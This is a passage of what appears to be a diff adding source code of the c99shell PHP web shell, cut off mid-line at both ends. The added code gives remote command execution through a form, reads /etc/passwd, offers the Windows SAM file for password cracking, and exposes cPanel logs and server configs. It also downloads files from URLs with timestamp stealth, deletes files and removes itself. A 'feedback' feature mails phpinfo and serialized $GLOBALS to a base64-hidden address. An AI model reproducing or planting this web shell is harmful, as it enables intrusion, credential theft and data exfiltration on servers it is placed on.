posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "<b>*nix /etc/passwd:</b><br>"; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; + echo join(":",$uid)."<br>"; + } + $i++; + } + } + else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} + else {echo "<b><font color=green>You can crack winnt passwords. 
<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ آ©.</font></b><br>";} + } + if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} + if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." 
- </b>";} echo $name.nl2br($value)."<br>";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = 
text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; + } + echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> + <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> + <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; + echo "<center>base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} + else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" 
readonly>".$debase64."</textarea>";} + echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; + } + echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; + $c = strlen($encoder_input); + for($i=0;$i<$c;$i++) + { + $hex = dechex(ord($encoder_input[$i])); + if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} + elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} + } + echo "\" readonly><br></center></form>"; +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} + else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = true; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} + } + else + { + if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." 
<br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "<center><b>Thanks for your feedback! 
Your ticket ID: ".$ticket.".</b></center>"; + } + else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} +} +if ($act == "search") +{ + echo "<b>Search in file-system:</b><br>"; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { + $ls_arr = $found; + $disp_fullpath = true; + $act = "ls"; + } + } + echo "<form method=POST> +<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act 
value=\"".$dspact."\"> +<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp +<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> +<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text +<br><br><input type=submit name=submit value=\"Search\"></form>"; + if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." 
objects per second).</b><br><br>";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} + else + { + $form = true; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = false; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" 
checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!<br>";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "<b>".$uploadmess."</b>"; + $act = "ls"; + } + else + { + echo "<b>File upload:</b><br><b>".$uploadmess."</b><form 
enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> +Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> +Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> +Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> +File-name (auto-fill): <input name=uploadfilename size=25><br><br> +<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> +<input type=submit name=submit value=\"Upload\"> +</form>"; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = false; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} + } + if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. 
For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." 
to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." 
to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "<b>Result of execution this command</b>:<br>"; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + @chdir($olddir); + } + else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = true;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== false) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} 
+ elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "<b>Name</b>"; + $row[] = "<b>Size</b>"; + $row[] = "<b>Modify</b>"; + if (!$win) + {$row[] = "<b>Owner/Group</b>";} + $row[] = "<b>Perms</b>"; + $row[] = "<b>Action</b>"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; + $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; + $row[$k] .= $y; + for($i=0;$i<count($row)-1;$i++) + { + if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + 
$tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + else + { + $type = "DIR"; + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + 
$row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; + if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} + else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} + if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} + else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img 